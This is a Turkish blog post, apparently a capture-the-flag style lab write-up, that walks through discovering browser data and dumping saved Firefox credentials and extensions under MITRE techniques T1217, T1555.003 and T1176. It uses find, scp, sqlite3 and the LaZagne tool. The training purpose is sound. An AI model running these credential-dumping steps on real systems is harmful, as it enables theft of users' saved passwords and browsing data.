Skip to main content
Hashnodearzu's blog

Command Palette

Search for a command to run...

MITRE: Dumping Browsers: T1217, T1555.003, T1176

Dumping Information from Browsers

Published
2 min read
MITRE: Dumping Browsers: T1217, T1555.003, T1176
A
arzu
Part of seriesCyberexam MITRE | ATT&CK Learning Path

Cyberexam platformunda yer alan MITRE | ATT&CK öğrenme yoluna ait, MITRE: Dumping Browsers: T1217, T1555.003, T1176 lab çözümünden bahsedeceğim.

Not: Lab bağlantı adresi - https://learn.cyberexam.io/challenges/mitre/dumping-browsers/mitre-dumping-browsers-t1217-t1555-003-t1176

Konuya Giriş

Bu lab içerisinde MITRE saldırı tekniklerinden

  • T1217 - Browser Information Discovery

  • T1555.003 - Credentials from Password Stores

  • T1176 - Browser Extension

yer verilmiştir.

Tehdit aktörleri eriştikleri sistemdeki tarayıcı tarafından tutulan yer imleri, kayıtlı hesaplar, tarayıcı geçmişi gibi bilgileri kontrol ederek kullanıcı hakkında bilgi toplar ve giriş bilgilerini ele geçirmeyi amaçlar.

Laboratuvar Çözümü

Sistemde hangi tarayıcının kullanıldığını anlamak için dpkg -l | grep 'firefox\|chromium\|chrome' komutu ile yüklenmiş paketler kontrol edilebilir.

home dizininde de ls -al komutunu çalıştırdığımızda tarayıcıya ait .mozilla dizinini görebiliriz.

Yer işaretleri içerisinde kaç tane URL bulunmaktadır?

Hangi tarayıcının kullanıldığı tespit edildikten sonra, tarayıcı bazlı keşifler yapabiliriz. Firefox için yer imleri bilgisi places.sqlite içerisinde bulunur.

Bulduğumuz yer imleri dosyası içerisine girelim. sqlite3 aracını kullanıyoruz. Hedef makinede sqlite3 aracı olmadığı için yerel makineye dosyayı gönderelim.

scp user@attack:/path/to/places.sqlite places.sqlite

Sonrasında sqlite3 ile ilgili dosyayı açalım.

Burada ilgili tablolar olarak moz_bookmarks ve moz_places bulunuyor.

Tarayıcıdan parolayı al. Yer imlerine eklenmiş URL nedir?

Yerel makinede saklanılan kullanıcı bilgilerini otomatik olarak tespit eden araçlar geliştirilmiştir. Bu lab içerisinde LaZagne aracının browsers modülünü kullanacağız.

scp komutu ile yerel makinedeki lazagne dosyasını (masaüstünde v2.4.5.tar.gz dosyası) hedef makineye kopyalıyorum.

/tmp dizini içerisine kopyaladıktan sonra arşivden çıkarıp aracı çalıştırıyorum.

Saldırı makinesine bağlanın. Yer imlerini içeren .sqlite dosyasının dosya dizini nedir?

İlk soruda kullanılan find komutu ile places.sqlite dizinini find / -path "*.mozilla/firefox/*/places.sqlite" 2>/dev/null komutunu kullanarak bulmuştuk.

Uzantılar nerede?

Uzantıları içeren dizin tarayıcının varsayılan profili altında yer alır.

Yer imlenmiş URL'e ait kullanıcı adı ve parola nedir?

LaZagne aracının çıktısında kullanıcı bilgilerini tespit etmiştik. Çözüm için username:password formatında yazabiliriz.

Kaç tane uzantı yüklüdür?

Uzantıları içeren dizin içerisinde xpi dosya formatında yüklü uzantılar yer alır. ls komutu ile listeleyerek yüklü uzantıların sayısını tespit edebiliriz.

#mitre-attack#cyberexam#browser-forensics#firefox

Comments

Join the discussion

No comments yet. Be the first to comment.

Cyberexam MITRE | ATT&CK Learning Path

Part 2 of 14

Bu seride Cyberexam platformu içerisinde yer alan MITRE ATTACK çerçevesi öğrenme yoluna ait lab çözümleri yer almaktadır.

Up next

MITRE: Defense Evasion: T1574.006

Hijack Execution Flow: Dynamic Linker Hijacking

More from this blog

arzu's blog

29 posts